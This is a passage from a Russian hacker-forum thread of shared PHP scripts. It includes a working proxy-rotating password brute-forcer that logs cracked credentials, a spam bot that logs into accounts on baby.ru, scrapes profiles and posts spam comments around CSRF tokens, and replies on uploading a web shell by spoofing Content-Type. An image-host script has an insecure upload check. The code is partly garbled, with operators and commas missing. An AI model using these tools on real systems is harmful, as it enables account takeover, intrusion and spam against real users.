Полезные скрипты

Discussion in 'PHP' started by SMiX, 2 Nov 2006.

  1. -=Zhenek=-

    -=Zhenek=- Elder - Старейшина

    Joined:
    31 Dec 2007
    Messages:
    283
    Likes Received:
    75
    Reputations:
    1
    DSCF{NUM}.JPG
    DSCF_{NUM}.JPG
    IMGP{NUM}.JPG
    IMG_{NUM}.JPG
    CIMG{NUM}.JPG
    P{NUM}.JPG
    DSCN{NUM}.JPG

    Это я свои фотки глянул... У кажлого фотоаппарата скорее всего свой шаблон. есть и такого вида : x_454fgd4f.jpg
     
    #1081 -=Zhenek=-, 11 Aug 2011
    Last edited: 11 Aug 2011
  2. Vova93

    Vova93 Banned

    Joined:
    5 Jul 2011
    Messages:
    1
    Likes Received:
    6
    Reputations:
    10
    PHP:
     Удобный брут с поддержкой прокси[/b]

    [SIZE=2][COLOR=White]Вот написал небольшой, удобный брут на PHP :) 
    Плюсы и небольшие минусы брута:
    [+] Быстрая работа
    [+] Поддержка прокси, к тому же они хранятся в txt-файле
    [-] Нету граба прокси, но это не проблема - писать минут 5

    Сейчас я вам покажу пример брута по логину -
    Наш логин: Admin
    Форма для входа: http://сайт.ру/services/?login=тут_логин&password=тут_пароль

    PHP-Код:
    [code]
    <?php
    echo "Брут завершен - посмотреть сбрученные пароли можно <a href='/good.txt' class='country_link'>здесь</a>, а несбрученные вот <a href='/bad.txt' class='country_link'>здесь</a>. Design by Vova93";
    $handle fopen("slovar.txt""r"); //Файл с паролями
    $email="Admin"//Здесь указываем ник (кого брутим)
    while (!feof($handle))
    {
    $p preg_split('~[\r\n]~'file_get_contents('proxy.txt')); //файл с проксями
    $proxy $p[rand(0,sizeof($p)-1)];
    $pass fgets($handle1024);
    $url "http://сайт.ру/services/"//Форма для входа
    $post "login=$email&password=$pass";
    $cfile 'text.txt';
    $ch curl_init();
    curl_setopt($chCURLOPT_PROXY$proxy);
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_URL$url);
    curl_setopt($chCURLOPT_HEADER0);
    curl_setopt($chCURLOPT_POSTFIELDS$post);
    curl_setopt($chCURLOPT_COOKIEJAR$cfile);
    curl_setopt($chCURLOPT_COOKIEFILE$cfile);
    curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue);
    curl_setopt($chCURLOPT_POST1);
    $result curl_exec($ch);
    curl_close($ch);
    if (
    strstr($result'Приветствуем тебя')) //Текст, который присутствует после авторизации, и отсутствует на не авторизованной странице
    {
    $h=fopen("good.txt""a"); //Тут будут сбрученные пароли
    fwrite($h$email.";".$pass);
    fclose($h);
    }
    else
    {
    $h=fopen("bad.txt""a"); //Тут несбрученные пароли
    fwrite($h$email.";".$pass);
    fclose($h);
    }
    }
    ?>
    [/code]

    На этом все ;) Надеюсь плюсик заслужил :p 
    З.Ы. Если нужно написать дополнение к скрипту, например граб прокси или что-нибудь еще - пишем в эту тему - обязательно напишу :rolleyes: [/COLOR][/SIZE]
     
  3. astrologer

    astrologer Elder - Старейшина

    Joined:
    30 Aug 2007
    Messages:
    837
    Likes Received:
    267
    Reputations:
    59
    Code:
    wget http://example.com/photos/{IMG,DSC}_{000123..130}.JPG
    не?
     
  4. Nikitosavich

    Nikitosavich New Member

    Joined:
    14 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Скрипт хостинга картинок бесплатно, хостинг картинок, бесплатно

    Написал себе хостинг картинок на PHP. (Спасибо Anthony Ryabov за авторизацию, а за js-споилер - krypt3r ;))
    Теперь поделюсь с вами, конечно бесплатно:
    PHP:
    <?php
    $url_do_papki 
    "http://site.domen/image-hosting/"//Ваша ссылка до папки со скриптом. Не забудьте поставить слеш ("/") в конце!
    $login="12345";    //Логин
    $pass=md5("12345");//Пароль
    $auth="1";       //Вкл/выкл авторизацию
    $dir_true_false is_dir('upload/');
    if (
    $dir_true_false=='')
    {
      
    mkdir("upload/"0777);
      
    header("Location: ".$_SERVER['PHP_SELF']);
    };
    if(isset(
    $_GET['img'])&&!empty($_GET['img']))
     {
     
    $images = array();
     
    $images[bg]='R0lGODdhKAAoAKEDAAAkCAArCgA4Df///ywAAAAAKAAoAAAC2oxvEsoBDl9rqNq0snocznyF3xZ5GhiKJ9lJa3qNZSfD8duan43Iubvj9XCzl0I1ESiXSoDACWVKjTIpMxq1Kl9ULfap3Y6q4a8zzB17wVkttWs1h2vqOBuMHsOl8vypKAcgODh4BwX442D4REi4mAj42FhohhhpNin4WHRpmBlo+SOZuZnTifVZOpMYmFppWse36Je0dzXrthN7+0WrQbbWm/u3u9Q3XFvchGuVtlLGPKWn/DjHdfORWCN04FO0LeSdA84tXkJuY05zzW0E6N6urvPX7q7NjlAAADs=';
     @
    ob_clean();
     
    header("Content-type: image/gif");
     echo 
    base64_decode($images[$_GET['img']]);
     exit();
    };
    if(isset(
    $_GET['style']))
     {
    echo 
    '
    input {
    Font-Family: fantasy;
    Font-size: 10px;
    color: white; Border-color: white;
    Border-style: solid;
    Border-width: 1px;
    BackGround-color: transparent;
    }
    #button {
    BackGround-color: black;
    }
    a {
    text-decoration: none;
    }
    a:link {
     border-bottom: 1px dotted white;
     color: #ffffff;
    }
    a:visited {
     border-bottom: 1px dotted white;
     color: #ffffff;
    }
    a:active {
     border-bottom: 1px dotted #ffe5b4;
     color: #ffe5b4;
    }'
    ;
    exit();
    };
    if (isset(
    $_GET['in']))
    {
    $nlogin=$_POST['login'];
    $npass=md5($_POST['pass']);
    if (
    $nlogin == $login and $npass == $pass)
    {
    setcookie('login',"$nlogin",time()+10000000000);
    setcookie('pass',"$npass",time()+10000000000);
    header("Location:" .$_SERVER['PHP_SELF']);
    }
    else {
    header("Location:" .$_SERVER['PHP_SELF']);}
    }
    if(
    $_COOKIE["login"] != "$loginor $_COOKIE["pass"] != "$pass"){

    if(
    $auth == "0"){setcookie("login""$login"time()+10000); setcookie("pass""$pass"time()+10000); echo "<script> document.location.replace('$SCRIPT_NAME'); </script>";}
    echo 
    "
    <head>
    <link rel='stylesheet' type='text/css' href='?style' />
    <meta http-equiv='content-type' content='text/html; charset=utf-8' />
    <title>Вход</title>
    <link type=text/css rel=StyleSheet href=?style>
    </head>
    <body background=?img=bg>
    <br><br><br><br>
    <center>
    <font color=white size=10 face=fantasy>
    <form method=post action=?in>
    <table style=text-align: left; width: 100px; border=0 cellpadding=2 cellspacing=2>
      <tbody>
        <tr>
          <td><font size='4' face='fantasy' color='white'>Логин:</font></td>
          <td><input name=login></td>
        </tr>
        <tr>
          <td><font size='4' face='fantasy' color='white'>Пароль:</font></td>
          <td><input name=pass type=password></td>
        </tr>
        <tr>
          <td></td>
          <td><input type=submit id=button value=Вход></td>
        </tr>
       </table>
      </tbody>
    </form>
    </font>
    </center>
    </body>"
    ;
    exit();
    }
    else
    {

    if(isset(
    $_GET['upload'])) {
    echo 
    '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
    echo 
    '<link rel="stylesheet" type="text/css" href="?style" />';
    echo 
    '<body background="?img=bg">';
    echo 
    '<font size="4" face="fantasy" color="white">';
    $uploaddir "/home/a9526880/public_html/mini-host/upload";
         
    $arr = array('a','b','c','d','e','f',
                     
    'g','h','i','j','k','l',
                     
    'm','n','o','p','r','s',
                     
    't','u','v','x','y','z',
                     
    'A','B','C','D','E','F',
                     
    'G','H','I','J','K','L',
                     
    'M','N','O','P','R','S',
                     
    'T','U','V','X','Y','Z',
                     
    '1','2','3','4','5','6',
                     
    '7','8','9','0','-','_');
        
    $rand "";
        for(
    $i 0$i 30$i++)
        {
          
    $index rand(0count($arr) - 1);
          
    $rand .= $arr[$index];
        }
    $img_format;
    if (
    $_FILES['userfile']['type'] == 'image/jpeg') {
        
    $img_format'.jpg';
    };
    if (
    $_FILES['userfile']['type'] == 'image/png') {
        
    $img_format'.png';
    };
    if (
    $_FILES['userfile']['type'] == 'image/gif') {
        
    $img_format'.gif';
    };
    $rand_and_format$rand.$img_format;
    if ((
    $_FILES['userfile']['type'] == 'image/jpeg')|($_FILES['userfile']['type'] == 'image/png')|($_FILES['userfile']['type'] == 'image/gif')) {
    if (
    move_uploaded_file($_FILES['userfile']['tmp_name'], 'upload/' $rand_and_format)) {
     echo 
    "Картинка успешно загружена! :)<br/>";
     echo 
    '<title>'.$_FILES['userfile']['name'].'</title>';
     echo 
    "
    <table style=text-align: left; width: 100px; border=0 cellpadding=2 cellspacing=2>
     <tbody>
     <tr><td><h3><font size='4' face='fantasy' color='white'>Информация о изображении: </font></h3></td><td></td></tr>
     <tr><td><b><font size='4' face='fantasy' color='white'>Оригинальное имя:</td><td><font size='4' face='fantasy' color='white'>"
    .$_FILES['userfile']['name']."</font></b></td></font></tr>
     <tr><td><b><font size='4' face='fantasy' color='white'>Mime-тип:</td><td><font size='4' face='fantasy' color='white'>"
    .$_FILES['userfile']['type']."</font></b></td></font></tr>
     <tr><td><b><font size='4' face='fantasy' color='white'>Вес картинки в байтах:</td><td><font size='4' face='fantasy' color='white'>"
    .$_FILES['userfile']['size']."</font></b></td></font></tr>
     <tr><td><b><font size='4' face='fantasy' color='white'>Ссылка на картинку:</td><td><font size='4' face='fantasy' color='white'><input type=text size=120 value='"
    .$url_do_papki."upload/".$rand_and_format."'></font></b></td></font></tr>
     <tr><td><b><font size='4' face='fantasy' color='white'>Ссылка на картинку BB-code:</td><td><font size='4' face='fantasy' color='white'><input type=text size=120 value='[img]"
    .$url_do_papki."upload/".$rand_and_format."[/img]'></font></b></td></font></tr>
     <tr><td><b><font size='4' face='fantasy' color='white'>Ссылка на картинку HTML:</td><td><font size='4' face='fantasy' color='white'><input type=text size=120 value='<img src="
    .$url_do_papki."upload/".$rand_and_format.">'></font></b></td></font></tr>
     </tbody>
    </table>
    "
    ;
     echo 
    '<br/><br/>';
    } else {
     echo 
    '<center><font color=white size="8">Ошибка! :(<br/>А загружали ли вы файл вообще? ;)</font><br/><a href="'.$_SERVER['PHP_SELF'].'"><input type=button id=button value=Назад></a></center>';
     echo 
    '<title>Ошибка :(</title>';
    }
     echo 
    '<a href='.$_SERVER['PHP_SELF'].'><input type=button id=button value=Назад></a><br><br>';


     echo 
    '<style type="text/css">
        #invdiv {
          display: none;
        }
      </style>
      <script type="text/javascript">
        vis = false;
        function inputclk() {
          var inp = document.getElementById ("inputid");
          var div = document.getElementById ("invdiv");
          if (vis) {
            div.style.display = "none";
            inp.value = "Hidden";
            vis = false;
          } else {
            div.style.display = "block";
            inp.value = "Visible";
            vis = true;
          }
        }
      </script>'
    ;


     echo 
    '
    <br/>
    <center><input type="button" id="button" value="Показать картинку" readonly="readonly" onclick="inputclk()" /><br />
    <div id="invdiv">
     <br/>
     <img src="upload/'
    .$rand_and_format.'" border=1>
    </div></center>
    '
    ;
     echo 
    '<br/>';
     echo 
    "</font>";
     echo 
    "</body>";
    } else {
        echo 
    '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
        echo 
    '<link rel="stylesheet" type="text/css" href="?style" />';
        echo 
    '<body background="?img=bg">';
        echo 
    '<font size="6" face="fantasy" color="white">';
        echo 
    '<center><font size="6" face="fantasy" color="white">Это не картинка...</font></cenetr>';
        echo 
    '<center><a href="'.$_SERVER['PHP_SELF'].'"><input type=button id=button value=Назад></a></center>';
        echo 
    '</font>';
        echo 
    '</body>';
    }
    } else {
    if(isset(
    $_GET['exit']))
     {
     echo 
    "
    <meta http-equiv='content-type' content='text/html; charset=utf-8' />
    <title>Выход</title>
    <font color='white' size=2 face=fantasy>
    <body background='?img=bg'>
    <link type=text/css rel=StyleSheet href=?style><center><br><br><br><br>Вы уверены?<br><br><a href="
    .$_SERVER['PHP_SELF']."?delc_y><input type=button id=button value=Да></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href=".$_SERVER['PHP_SELF']."><input id=button type=button value=Нет></a></center>
    </font>"
    ;
    exit();
    } else {
    echo 
    '<meta http-equiv="content-type" content="text/html; charset=utf-8" />';
    echo 
    '<title>Site :)</title>';
    echo 
    '<link rel="stylesheet" type="text/css" href="?style" />';
    echo 
    '<body background="?img=bg">';
    echo 
    '<font color="white" size=2 face=fantasy>';
    echo 
    '<center>';
    if (
    $auth==1)
    {
      echo 
    '<a href=?exit>Выход</a>';
    }
    echo 
    '<br/><br/>Поддерживаются форматы PNG, JPG, GIF<br/><br/>';
    echo 
    '<form enctype="multipart/form-data" action="?upload" method="post">';
    echo 
    '<input type="hidden" name="MAX_FILE_SIZE" value="10485760">';
    echo 
    'Загрузить картинку (не более 10 мб): <input name="userfile" type="file">';
    echo 
    '<input type="submit" id=button value="Загрузить"><br/><br/><font size=1>Made By Nikitosavich</font>';
    echo 
    '</form>';
    echo 
    '</cenetr>';
    echo 
    '</font>';
    echo 
    '</body>';
    }
    }
    }
    if(isset(
    $_GET['delc_y']))
     {
     
    setcookie('login');
     
    setcookie('pass');
     
    header("Location: ".$_SERVER['PHP_SELF']);
    }
    ?>
    P.S. PHP изучаю от силы неделю, так что строго не судите.

    P.P.S. Нужно только поместить скрипт в папку на хостинге, указать url до папки со скриптом, указать логин и пароль для авторизации, включить/выключить авторизацию (на ваше усмотрение) и можно использовать :) (читайте первые комментарии в скрипте)

    P.P.P.S. Скрипт сам создаёт папку "upload", с правами доступа "0777".
     
    #1084 Nikitosavich, 15 Aug 2011
    Last edited: 17 Aug 2011
  5. skrutcher

    skrutcher New Member

    Joined:
    17 Jul 2011
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    подмена Content-Type - profit.
     
  6. Nikitosavich

    Nikitosavich New Member

    Joined:
    14 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    skrutcher, не. Это просто проверяет какой mime-тип у файла и если mime-тип соответствует mime-типу изображений (то есть png, gif, jpg) тогда из папки Temp картинка переносится в папку upload.
     
  7. Nikitosavich

    Nikitosavich New Member

    Joined:
    14 Mar 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Вставляет картинку которая показывает тИЦ яндекса :D
    PHP:
    <?php
    if (isset($_GET['ip']))
    {
    echo 
    "<center><font size='5'>тИЦ: </font><img src='http://yandex.ru/cycounter?".$_GET['ip']."' /></center>";
    }
    ?>
     
    #1087 Nikitosavich, 19 Aug 2011
    Last edited: 19 Aug 2011
  8. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    795
    Likes Received:
    140
    Reputations:
    73
    И че? Если подменить content-type - то можно залить шелл. Если интересно напиши в личку - продемонстрирую
     
  9. phpdreamer

    phpdreamer Member

    Joined:
    26 Jul 2009
    Messages:
    522
    Likes Received:
    86
    Reputations:
    19
    пример http://berghowto.info/django-blog/2010/01/31/content-type/

    но так как он имя файла заменяет на рандом + .jpg (.png), то шелл же не будет выполняться как php
     
    #1089 phpdreamer, 19 Aug 2011
    Last edited: 19 Aug 2011
  10. PATCH

    PATCH Member

    Joined:
    16 Jul 2011
    Messages:
    38
    Likes Received:
    5
    Reputations:
    11
    незнаю мб уже выкладывалось все таки 110 страниц)
    скрипт для случайной генерации пароля и занесением его в бд
    (Randomize Dictionary v0.1 beta)
    + при запуски скрипта можно настроить (соединение с бд, минимальная и максимальная длина пароля, настройка использование русских,английский,числовых символов, настройка set_time_limit);
    + защита от повтора пароля
    + возможен запуск нескольких копий (использовать на мощных пк)
    - хз если что то надо еще для такого дела, можно и дописать пишите на 2011-patch@mail.ru если будут какие-нибудь идеи.
    cкачать
     
    #1090 PATCH, 19 Aug 2011
    Last edited: 19 Aug 2011
  11. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Спам- это плохо, вот и я месяца 4-5 назад попробовал побаловаться спамом, - проспамил пару раз и заработал около 200 баксов, но ну его нафиг такие деньги :) не мое это, единственное что мне жалко это пару часов на написание скрипта- поэтому и выкладываю его сюда и без подробной инструкции чтоб у наших скрипткидди небыло возможности им воспользоваться, но а кто понимает- тот сообразит как настроить

    PHP:
     <?php 
     set_time_limit
    (0);
    $ab=fopen("akk.txt","a+" );
        function 
    read($path

       
    $file=fopen($path,"r"); 
       
    $bufer fread($file,filesize($path)); 
       
    fclose($file); 
       return(
    $bufer); 
     
    }


     
    $file='acount.txt';
    $b explode("\r\n",read($file));//получаем логины пассы 
    $c=count($b);
    echo 
    $c;
    print_r($b);
    class 
    post 

        var 
    $cookie = array(); 
        var 
    $nohead 1
         
        function 
    query($url='',$content='',$referer=''$headers=array()) 
        { 
            
    $cfile =  $_SERVER['DOCUMENT_ROOT'].'/cookies.txt'

            
    $ch curl_init();   
            
    curl_setopt($chCURLOPT_URL,$url); 
            
    curl_setopt($chCURLOPT_HEADER1); 
            
    curl_setopt($chCURLOPT_RETURNTRANSFER,1); 
            
    curl_setopt($chCURLOPT_TIMEOUT15); 
            
    curl_setopt($chCURLOPT_USERAGENT'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/2008070208'); 

            
    curl_setopt($chCURLOPT_COOKIEJAR$cfile);  
            
    curl_setopt($chCURLOPT_COOKIEFILE$cfile);  
             
            if (!empty(
    $this->cookie)) curl_setopt($chCURLOPT_COOKIEimplode('; ',$this->cookie)); 
            if (!empty(
    $content)) {curl_setopt($chCURLOPT_POST1);curl_setopt($chCURLOPT_POSTFIELDS$content);} else {curl_setopt($chCURLOPT_POST0);} 
            if (!empty(
    $referer)) curl_setopt($chCURLOPT_REFERER$referer); 
            if (!empty(
    $headers)) curl_setopt($chCURLOPT_HTTPHEADER$headers); 
            
    $ss=curl_exec($ch); 
            
    curl_close($ch); 
             
            return (
    $this->nohead preg_replace('#^[\s\S]+?\r\n\r\n#i','',$ss) : $ss); 
        } 

     
    $begin =$_POST["begin"];
    $finish =$_POST["finish"];
    if(isset(
    $_POST["begin"])&&($_POST["finish"]))
    {
      for(
    $i=0;$i<$c;$i++) 
    {
    for (
    $x=$begin$x<=$finish$x++)// количество страниц которые парсим
    {
    $reg = new post(); 
    $my $reg->query('http://www.baby.ru/'); 
    preg_match("#var CSRF = \'(.*)\';var MONTHES =#iU"$my$csrf); 
    $csrf $csrf[1]; 
    $a=$b[$i];
    $a explode(";",$a);
    $login$a[0];
    $password$a[1];

    $url="http://www.baby.ru/login/iframe"
    $post'form_name=login_form&login='.$login.'&password='.$password.'&remember=true&redirect=0&CSRF='.$csrf
    $ref='http://www.baby.ru/'

    $reg->query($url$post$ref); 
    $urlbaby="http://www.baby.ru/communicate/people/?filter=friends&location%5Bcountry%5D=-1&location%5Bregion%5D=-1&location%5Bcity%5D=-1&user_start_age=-1&user_end_age=-1&status%5Bstatus%5D=anybody&status%5Bpregnant%5D=1&status%5Bmother%5D=w_0&page=".$x

     
    $go=$reg->query($urlbaby);
     
    $result iconv("utf-8""windows-1251"$go);$reg=NULL;
     if (
    strstr($result"Личная страница"))
     {
    //если удался вход
    //echo $result;
    flush(); 
    preg_match_all('#\/\" ><strong>(.*)<\/stron#iU',$result $out);

    $arr=$out[1];
    preg_match_all('#class=\"left-margin\" href=\"(.*)\" ><strong>#iU',$result $out1);

    $arr1=$out1[1];
    //friendship_mail"><a href="http://www.baby.ru/messages/dialog/5279167/" stick="Диалог"
    for ($ia 0$ia count($arr); $ia++)  
      { 
      
      
    $reg = new post(); 
    $lic $reg->query($arr1[$ia]); 
    $pismo=$_POST["pismo"];
    $pismo1=urlencode(iconv("windows-1251""utf-8",$pismo));

    preg_match('#value=\"(.*)\" \/><input type=\"hidden\" name=\"service_name\"#iU'$lic$id);
    $id=$id[1];

    preg_match('#name=\"csrf_token\"   value=\"(.*)\" \/>#iU'$lic$token);
    $token=$token[1];
    $wer"страница $x ссылка $arr1[$ia]";
    fwrite($ab,"$wer  \r\n");
        echo 
    "<br>имя $arr[$ia] ссылка для отправки $arr1[$ia]  айди=$id   токен=  $token<br>"
        
    $name=urlencode(iconv("windows-1251""utf-8",$arr[$ia]));
        
    $url="http://www.baby.ru/comments/add/?return=".$arr1[$ia]; 
    $post'item_id='.$id.'&service_name=users&parent_id=0&answer_id=0&csrf_token='.$token.'&comment_content=%D0%97%D0%B4%D1%80%D0%B0%D0%B2%D1%81%D1%82%D0%B2%D1%83%D0%B9%D1%82%D0%B5+'.$name.''.$pismo1
    $ref=$arr1[$ia]; 

        
    $reg->query($url$post$ref);
        
    flush(); 
     } 


    }
    else {echo 
    "вход не выполненн"; }
    }
    }
    fclose($ab);
    }
    else
    {
    echo 
    '<center>
     <form action="1.php" METHOD=POST>
     

    <br><br><font color=Green>Письмо</font> <br>
     <textarea name=\'pismo\' rows=\'20\' cols=\'50\'> </textarea >

     <br><br><br><br><font color=Green>С какой до какой странице спамим</font> <br> <br><br><br><br>
     <center>
    начать с<input type="text" name="begin">
    закончить на<input type="text" name="finish"><br>


    </center><br>
    <br>
             <INPUT TYPE="submit" VALUE="Отправить">
             </FORM>
             </center>
            
            
    '
    ;


    }
    ?>

    Единственное что подскажу что скрипт спамит по стенам соцсети http://www.baby.ru , вобщем была возможность спамить с активной ссылкой и скрипт обращался к хозяину стены по имени

    P.S. Сразу говорю что я его писал месяца 4 назад и на тот момент он был актуален- допиливать я его не собираюсь- потомучто спам- зло :D
     
    1 person likes this.
  12. PATCH

    PATCH Member

    Joined:
    16 Jul 2011
    Messages:
    38
    Likes Received:
    5
    Reputations:
    11
    Легкая программа с визуальным оформлением для
    - преобразования в md5,sha1 хэши
    - Определения длины строки
    - Кодирования и декодирования в base64
    - Кодирование и декодирование строки URL
    - Для отсылки HTTP запроса и получение информации

    PHP:
    <?php
    /* 
     €
     € @name Cry Engine Web
     € @author PATCH
     € @copyright 2011 Cry Engine Web
     € @version 0.1 Beta
     € @web None
     €
    */
     
    //надстройка для формы
    $index 'hash.php';

    echo 
    '<html>
    <body>
    <table align="center" width="80%" border="3">
      <tr>'
    ;
        
    $left_menu 
    '   <td width="25%">
        <div align="center"><a href="?p=md5">md5 хэш</a></div>
        <div align="center"><a href="?p=sha1">sha1 хэш</a></div>
        <div align="center"><a href="?p=strlen">strlen (длина строки)</a></div>
        <div align="center"><a href="?p=base64">Base 64</a></div>
        <div align="center"><a href="?p=URLcode">URL code</a></div>
        <div align="center"><a href="?p=Get_Header">Отослать HTTP запрос</a></div>
        </td>'
    ;
        
    if(!isset(
    $_GET['p']))
    {
        echo 
    $left_menu
        echo  
    '<td width="75%"></td>';
    }
    if(
    $_GET['p'] =='md5')
    {
        echo 
    $left_menu;
        echo
        
    '<td  align="center"  width="75%">
        <form action="'
    .$index.'?p=md5" method="post">
        <textarea name="text" cols="60" rows="30">
        </textarea>
        <p><input name="go_md5" type="submit" value="преобразовать"></p>
        </form>'
    ;
         if(
    $_GET['p'] =='md5'  and isset($_POST['go_md5']))
        {
            
    $text trim($_POST['text']);
            
    $str md5($text);
            echo 
            
    '<p> MD5 Hash</p>
         <br>'
    .$str;
        }
        
        echo 
    '</td>';
    }

    if(
    $_GET['p'] =='sha1')
    {
        echo 
    $left_menu;
        echo
        
    '<td  align="center"  width="75%">
        <form action="'
    .$index.'?p=sha1" method="post">
        <textarea name="text" cols="60" rows="30">
        </textarea>
        <p><input name="go_sha1" type="submit" value="преобразовать"></p>
        </form>'
    ;
         if(
    $_GET['p'] =='sha1'  and isset($_POST['go_sha1']))
        {
            
    $text trim($_POST['text']);
            
    $str sha1($text);
            echo 
            
    '<p> sha1 Hash</p>
             <br>'
    .$str;
        }
        
        echo 
    '</td>';
    }

    if(
    $_GET['p'] =='strlen')
    {
        echo 
    $left_menu;
        echo
        
    '<td  align="center"  width="75%">
        <form action="'
    .$index.'?p=strlen" method="post">
        <textarea name="text" cols="60" rows="30">
        </textarea>
        <p><input name="go_strlen" type="submit" value="преобразовать"></p>
        </form>'
    ;
         if(
    $_GET['p'] =='strlen'  and isset($_POST['go_strlen']))
        {
            
    $text trim($_POST['text']);
            
    $str strlen($text);
            echo 
    '
            <p>Длина строки</p>
            <br>'
    .$str;
        }
        
        echo 
    '</td>';
    }

    if(
    $_GET['p'] =='base64')
    {
        echo 
    $left_menu;
        echo
        
    '<td  align="center"  width="75%">
        <form action="'
    .$index.'?p=base64" method="post">
        <textarea name="text" cols="60" rows="30">
        </textarea>
        <div><input name="type" type="radio" value="1">Кодировать в base64</div>
        <div><input name="type" type="radio" value="2">Декодировать из base64</div>
        <p><input name="go_base64" type="submit" value="преобразовать"></p>
        </form>'
    ;
         if(
    $_GET['p'] =='base64'  and isset($_POST['go_base64'])  and $_POST['type']==1)
        {
            
    $text trim($_POST['text']);
            
    $str base64_encode($text);
            
            echo 
    '
            <p>base64 Encode</p>
            <br>
            <textarea name="text" cols="60" rows="30">'
    .$str.'</textarea>';
        }
        if(
    $_GET['p'] =='base64' and isset($_POST['go_base64']) and $_POST['type']==2)
        {
            
    $text trim($_POST['text']);
            
    $str base64_decode($text);
            
            echo 
    '
            <p>base64 Decode</p>
            <br>
            <textarea name="text" cols="60" rows="30">'
    .$str.'</textarea>';
        }
        
        echo 
    '</td>';
    }

    if(
    $_GET['p'] =='URLcode')
    {
        echo 
    $left_menu;
        echo
        
    '<td  align="center"  width="75%">
        <form action="'
    .$index.'?p=URLcode" method="post">
        <textarea name="text" cols="60" rows="30">
        </textarea>
        <div><input name="type" type="radio" value="1">Кодировать URL</div>
        <div><input name="type" type="radio" value="2">Декодировать URL</div>
        <p><input name="go_URLcode" type="submit" value="преобразовать"></p>
        </form>'
    ;
         if(
    $_GET['p'] =='URLcode'  and isset($_POST['go_URLcode'])  and $_POST['type']==1)
        {
            
    $text trim($_POST['text']);
            
    $str urlencode($text);
            
            echo 
    '
            <p>URL Encode</p>
            <br>
            <textarea name="text" cols="60" rows="30">'
    .$str.'</textarea>';
        }
        if(
    $_GET['p'] =='URLcode' and isset($_POST['go_URLcode']) and $_POST['type']==2)
        {
            
    $text trim($_POST['text']);
            
    $str urldecode($text);
            
            echo 
    '
            <p>URL decode</p>
            <br>
            <textarea name="text" cols="60" rows="30">'
    .$str.'</textarea>';
        }
        
        echo 
    '</td>';
    }

    if(
    $_GET['p'] =='Get_Header')
    {
        echo 
    $left_menu;
        echo
        
    '<td  align="center"  width="75%">
        <form action="'
    .$index.'?p=Get_Header" method="post">
        <input name="text" type="text" size="100" maxlength="1000">
        <p><input name="go_Get_Header" type="submit" value="Отослать"></p>
        </form>'
    ;
         if(
    $_GET['p'] =='Get_Header'  and isset($_POST['go_Get_Header']))
        {
            
    $text trim($_POST['text']);
            
    $str[''] = get_headers($text);
            echo 
    '
            <p>запрос</p>
            <br>'
    ;
            foreach (
    $str[''] as $st)
            {
              echo 
    $st.'<br>';
            }
        }
        
        echo 
    '</td>';
    }





    echo 
    '    
      </tr>
    </table>
    </body>
    </html>' 
    ;

    ?>
     
    zakidorex likes this.
  13. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Грабер текстов песен с moskva.fm по ключевым словам.
    Удобно воспользоваться, когда надо найти одну из из песен.
    PHP:
    <?php
    //PHP4, простой код для изучения новичками. Для личного использования.
    if(empty($_POST['data'])) {
    ?><html>
        <head>
        <title>Создать изображение</title>
            <style>
    .tab {
        background-color:#dfdfdf;
        border:1px solid black;
        margin-top:100px;
        width:200px;
    }
    .inputbut {
        font-size:11px;
        font-family:verdana;
        width:120px;
    }
    .inputtxt {
        font-size:11px;
        font-family:verdana;
        border:1px solid #234D76;
        background-color:#EAEAEA;
        width:120px;
    }
            </style>
        </head>
    <body>
    <form method="post">
        <div align="center">
            <table class="tab">
                <tr><td colspan=2 align="center" class="tab">Moskva.fm:</td></tr>
                <tr><td class='form'><b>Строка поиска: </b></td><td class='form'><input name="data" class="inputtxt"></td></tr>
                <tr><td class='form'><b>Логин: </b></td><td class='form'><input name="login" class="inputtxt"></td></tr>
                <tr><td class='form'><b>Пароль: </b></td><td class='form'><input name="pass" class="inputtxt"></td></tr>
                <tr><td>&nbsp;</td><td align="left" style='padding:10 5 0 5;'><input type="submit" value='Вывод' class="inputbut"></td></tr>
            </table>
    </form>
    </body>
    </htm><?php
    } elseif(!empty($_POST['data'])) {
    $login = (string)$_POST['login'];
    $pass md5((string)$_POST['pass']);
    function 
    curl_open($url) {
    $site curl_init();
      
    curl_setopt($siteCURLOPT_URL$url);
      
    curl_setopt($siteCURLOPT_USERAGENT'Opera 11.2');
      
    curl_setopt($siteCURLOPT_HEADERfalse);
      
    curl_setopt($siteCURLOPT_CONNECTTIMEOUT3);
      
    curl_setopt($siteCURLOPT_ENCODING'gzip, deflate');
      
    curl_setopt($siteCURLOPT_RETURNTRANSFERtrue);
      
    $out curl_exec($site);
      
    curl_close($site);
    return 
    $out;
    }
    function 
    id_txt($id) {
    global 
    $login$pass;
        
    $site curl_init();
      
    curl_setopt($siteCURLOPT_URL'http://www.moskva.fm/flxml.html');
      
    curl_setopt($siteCURLOPT_USERAGENT'Opera 11.2');
      
    curl_setopt($siteCURLOPT_HEADERfalse);
      
    curl_setopt($siteCURLOPT_CONNECTTIMEOUT3);
      
    curl_setopt($siteCURLOPT_ENCODING'gzip, deflate');
      
    curl_setopt($siteCURLOPT_RETURNTRANSFERtrue);
      
    curl_setopt($siteCURLOPT_POSTFIELDS'<data type="songtext">
      <songtext xmlns="http://www.moskva.fm/flash-songtext">
        <song id="'
    .$id.'" type="track"/>
      </songtext>
      <auth user="'
    .$login.'" hash="'.$pass.'"/>
    </data>'
    );
      
    $out curl_exec($site);
      
    curl_close($site);
    return 
    strip_tags(str_replace(array('<![CDATA[',']]>'),'',$out."\n"));
    }
    $find=array();
